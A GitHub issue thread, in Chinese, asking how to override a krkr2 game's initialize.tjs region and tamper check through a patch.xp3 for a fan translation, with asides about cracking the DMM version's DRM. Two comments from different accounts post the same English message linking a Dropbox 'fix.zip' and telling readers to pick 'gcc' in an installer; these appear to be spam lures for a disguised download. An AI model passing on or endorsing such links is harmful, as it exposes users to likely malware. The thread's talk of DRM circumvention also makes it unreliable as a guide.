### ISSUE TITLE
关于krkr游戏的initialize.tjs的覆盖问题

### ISSUE THREAD

**Issue by Angelichowl** [Dir-A/Dir-A_Essays_MD#11]
游戏名：缘之空DL版
目标：（优雅地）绕过data.xp3中的initialize脚本的文件检测，实现免转区

描述：游戏本身各方面比较基础，引擎为krkr2，DLSite版是playerDRM加密比较棘手，但DMM版是软电池验证好破；加密方式GAR可查，用的“yome no imouto……”，游戏内的UI图标和消息文本的脚本这些把修改的文件打进patch包可以直接读取，汉化本身没什么大问题。

主要的问题是发现data.xp3的初始化脚本无法被覆盖，即system中的initinitalize.tjs。里面有一段检测系统国区和文件是否被篡改的代码，表现出来的功能是检测国区，直接打开会报错。验证本身好过，代码删了就行，替换data.xp3可以正常运行，但是想尝试着把这个脚本放在patch中覆盖掉data.xp3里的脚本，没有找到合适的方法。（这段主要参考的视频[https://www.bilibili.com/video/BV1qQ4y1k7Gs/]）

别的方法倒也可以避开这个问题，我设想了两种方案，一种是修改exe中forcedataxp3那部分使其读取另外的xp3文件或文件夹，另一种是打个包做一个程序自动替换data.xp3，这个游戏的data文件很小，也不是不行。
只是想问一下大佬如果就是想把脚本打包进patch.xp3，通过添加修改脚本的路径读取来绕过data.xp3的脚本，这个问题本身是否可以被解决，应该添加什么代码（因为这个游戏目前还没有能用的破解网站加密的生肉资源，如果连着修改过的exe一起发布就相当于顺便破解掉了，不是很想做第一个破解的人）

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dir-A** [comment]
[儓僗僈僲僜儔.zip](https://github.com/user-attachments/files/16744835/default.zip)
解压后把  儓僗僈僲僜儔.cf  放游戏目录下
